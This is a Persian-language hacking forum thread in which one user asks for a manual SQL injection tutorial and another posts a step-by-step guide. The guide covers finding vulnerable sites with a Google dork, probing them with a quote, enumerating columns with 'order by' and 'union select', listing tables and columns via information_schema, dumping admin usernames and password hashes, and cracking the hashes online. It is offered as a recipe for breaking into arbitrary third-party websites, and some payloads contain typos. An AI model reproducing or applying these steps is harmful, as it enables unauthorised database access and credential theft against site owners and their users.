Mr.Rex ارسال شده در آوریل 16 2016 گزارش اشتراک گذاری ارسال شده در آوریل 16 2016 سلام دوستان اموزش هک سایت به روشsql دستی تو انجمن گشتم ناقص گفتن اگه کسی میدونه اموزششو بگه مرسی واکنش ها : iranihacker 1 نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر گزینه های به اشتراک گذاری بیشتر...
GHOST ارسال شده در آوریل 16 2016 گزارش اشتراک گذاری ارسال شده در آوریل 16 2016 سلام دوستان اموزش هک سایت به روشsql دستی تو انجمن گشتم ناقص گفتن اگه کسی میدونه اموزششو بگه مرسی سلام به همه...!ا SQLامروز اومدم با هک سايت با باگ (اس کيو ال)ا sqlنکته:براي هک سايت باگ هاي مختلفي است اما ما با باگ اموزش ميدم نکته:براي فهميدن اين که سايت باگ (اس کيو ال) دارد يا نه اخر اسم ان بايد اين باشد faq.php?id=XX به جاي xx يک عدد است مثال: This is the hidden content, please ورود یا ثبت نام براي اينکه مطما بشيم بايد در اخر ان ( ' ) حرف را بگزاريم و اينتر بزنيم حالا اگر ارور داد و در بين ارور ان اين حرف Sql بود قابل هک اما اگه نبود ول کن بريم سايت بعدي براي اينکه سايت هايي پيدا کنيم که faq.php?id=XX داشته باشد در گوگل سرچ کنيد inurl:"php?id=" حالا بيشتر سايت هايي که مياد تقريبا قابل هک است خوب بريم ادامه کار تا اينجا فرض ميکنيم در ارور حرف SQl بود 2________________________________ حالا در اخر اسم سايت ميزنيم +order+by+X-- به جاي "ايکس" اعدادي ميگزاريم تا اخرين عدد را پيدا کنيم مثلا عدد5 سايت سالمه 6سالمه 7سالمه 8سالمه 9ارور ميده پس بايد انقدر عدد بديم تا بفهميم اخرين ستون کدام است مثال This is the hidden content, please ورود یا ثبت نام 3____________________________________________ خوب حالا ميخواهيم بفهميم کدام ستون نفوظ پزير است ميزنيم +union+select+1,2,3,4,5,6,7,8,9,10-- از 1 شروع ميکنيم تا به اخرين عددي که در مرحله 2 پيدا کرديم مثال This is the hidden content, please ورود یا ثبت نام در بالا ارور ميدهد چرا؟ بايد در قبل از 2 faq.php?id=2 يک (-)بزايم مثال This is the hidden content, please ورود یا ثبت نام حالا در همان سايت يک جواب ميدهد که در اين جواب يک عدد است که اين عدد همان سوتون قابل نفوظ است 4__________________________________________________ براي پيدا کردن ورژن ديتل بيس ميزنيم +union+select+1,2,3,version(),5,6,7,8,9,10-- نکته:در بالا من حرف ورژن را به جاي 4 قرار دادم شما به جاي سوتون باز قرار دهيد (همان عدد که در قسمت 3 بدست اورديم گفتيم قابل نفوظ است) حالا جوابي ميايد به که ورژن را نوشته مثال This is the hidden content, please ورود یا ثبت نام 5____________________________________ بدست اوردن ديتا بيس +union+select+1,2,3,database(),5,6,7,8,9,10-- نکته:در بالا من حرف ديتا بيس را به جاي 4 قرار دادم شما به جاي سوتون باز قرار دهيد (همان عدد که در قسمت 3 بدست اورديم گفتيم قابل نفوظ است) حالا جوابي ميايد که ديتابيس را نوشته مثال This is the hidden content, please ورود یا ثبت نام 6___________________________________________ گرفتن تيبل ادمين اين مد را به اخر سايت اضافه ميکنيم تا نام :تيبل ها" را بدست اوريم +union+select+1,group_concat(table_name),3,4+from+information_schema.tables-- حالا نام تيبل ها به رديف مياد ما بايد بنبال اين تيبل ها بگرديم (admins,admin,user,users)يا نام هايي شبيه اين اگر اينجور نام هارا نجستيد ديگه سايت به درد نميخوره بايد برين يک سايت ديگه فرص کنيم حرف userبود name tabel admin sait = "user" 7__________________________________________ بدست اوردن "کولدومن"هاي ادمين اين کد را اخر سايت اضافه ميکنيم union+select+1,group_concat(column_name),3,4+from+informaion_schema.columns+where+table_Name=XXX-- XXXبه جاي نام "تيبل"که در مرحله 6 بدست اورديد وارد کنيد مثال union+select+1,group_concat(column_name),3,4+from+informaion_schema.columns+where+table_Name=user-- حالا نام تيبل هاي ادمين مياد 8_________________________________________________ بدست اوردن يوزر +union+select+1,C,3,4_from+T-- T=Name table ke be dast avadid C=name column ke be dast ovordid bedid ((کولدوم هاي زيادي بدست مياد براي بدست اوردن يوزر ان مولدووم هاي که نامشون شبيه يوزر است وارد کنيد)) 9__________________________________________________ بدست اوردن پسوورد +union+select+1,C,3,4_from+T-- T=Name table ke be dast avadid C=name column ke be dast ovordid bedid ((کولدوم هاي زيادي بدست مياد براي بدست اوردن يوزر ان کولدووم هاي که نامشون شبيه پسوورد هست را بدهيد است وارد کنيد)) 10_______________________________________ پسوردي که بدست مياد بشکل هاش کد مياد براي اينک کد به صورت صبيعي شود وارد سايت md5decrypter.co.uk شويد و هاش کد بدست امده را وارد کنيد واکنش ها : DeMoN، arashghost، jigsaw و 1 نفر دیگر 3 1 نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر گزینه های به اشتراک گذاری بیشتر...
پست های پیشنهاد شده
به گفتگو بپیوندید
هم اکنون می توانید مطلب خود را ارسال نمایید و بعداً ثبت نام کنید. اگر حساب کاربری دارید، برای ارسال با حساب کاربری خود اکنون وارد شوید .